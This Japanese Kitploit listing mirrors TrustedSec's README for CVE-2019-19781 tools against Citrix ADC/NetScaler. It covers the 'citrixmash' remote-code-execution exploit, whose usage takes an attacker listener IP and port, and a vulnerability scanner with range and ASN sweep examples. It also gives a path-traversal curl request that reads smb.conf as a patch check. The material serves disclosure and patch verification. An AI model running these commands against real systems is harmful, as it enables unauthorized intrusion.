Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2019-19781 — これはCitrix ADC(NetScaler)の脆弱性のために公開されたツールです。他の人が先にエクスプロイトコードを公開したため、我々はこれを開示しているに過ぎません。 | Kitploit
ツール/GitHubGitHub/trustedsec/cve-2019-19781
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストリモートアクセスツール
GitHubtrustedsec/cve-2019-19781

cve-2019-19781

これはCitrix ADC(NetScaler)の脆弱性のために公開されたツールです。他の人が先にエクスプロイトコードを公開したため、我々はこれを開示しているに過ぎません。

リポジトリを見る
5731256年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-19781

これは、他の研究者が先にコードを公開したため、アップロードされたものです。防御側がシステムにパッチを適用する十分な時間がある間、もう少し長く非公開にしておきたかったところです。

私たちは責任ある開示を支持していますが、今回は既に秘密が漏れてしまっていました。

エクスプロイト: CVE-2019-19781

Citrixmash (CVE-2019-19781 エクスプロイト)

root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py

Citrixmash v0.1 - Citrix ディレクトリトラバーサルバグ (CVE-2019-19781) を悪用します ツール作成者: Rob Simon および Dave Kennedy 貢献者: TrustedSec チーム ウェブサイト: https://www.trustedsec.com 情報: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ フォレンジックと IOC: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/

このツールは、Citrix ADC (NetScaler) のディレクトリトラバーサルバグを悪用し、XML 形式でファイルを被害マシンに追加する Perl スクリプトを呼び出します。これにより、リモートコード実行が可能になります。

以下の 2 つのファイルの場所を必ずクリーンアップしてください: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

victimaddress と attackerip_listener フィールドでは、DNS ホスト名と IP アドレスの両方がサポートされていることに注意してください。

使用法:

python citrixmash.py <attackerip_listener> <attacker_port>

usage: citrixmash.py [-h] target targetport attackerip attackerport

CVE-2019-19781 スキャナー

これは、サーバーがまだ CVE-2019-19781 に対して脆弱かどうかを確認するための簡単なテストです。

使用法: python3 cve-2019-19781.py

注: CIDR 表記 (例: 192.168.1.1/24) やホスト名も使用できます。

結果は、サーバーが脆弱かどうかを示します。一度に 1 つのサーバーしかスキャンできません。

CVE-2019-19781-Scanner 会社: TrustedSec 作成者: Dave Kennedy これは、リモートシステムがまだ CVE-2019-19781 に対して脆弱かどうかを確認します。一度に 1 台のホストのみをスキャンします。 CIDR 表記も使用できます。例: 192.168.1.1/24 IP アドレスの代わりにホスト名を使用することもできます。 外部ツールで生成された IP アドレスを含むファイルを使用することもできます。

例: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 例2: python3 cve-2019-19781_scanner.py 192.168.1.1 443 例3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 例4: python3 cve-2019-19781_scanner.py as15169 443 例5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose 例6: python3 cve-2019-19781_scanner.py file:hostfile 443

使用法: python3 cve-2019-19781_scanner.py targetip targetport

usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]

手動パッチ検証

この脆弱性が緩和されているかどうかをテストしたい場合は、以下を使用してください:

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is

または、非公開または内部のエンタープライズ CA を使用している場合は、--insecure オプションを使用して上書きできます。

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure

403 が返された場合はパッチが適用されています。または、Citrix のウェブサイトが返され、smb.conf ファイル自体が返されない場合も同様です。

smb.conf が表示される場合は、脆弱な状態です。

インストール

必要なパッケージをインストールするには、以下のコマンドを実行する必要があります。

pip3 install -r requirements.txt

ツールをダウンロード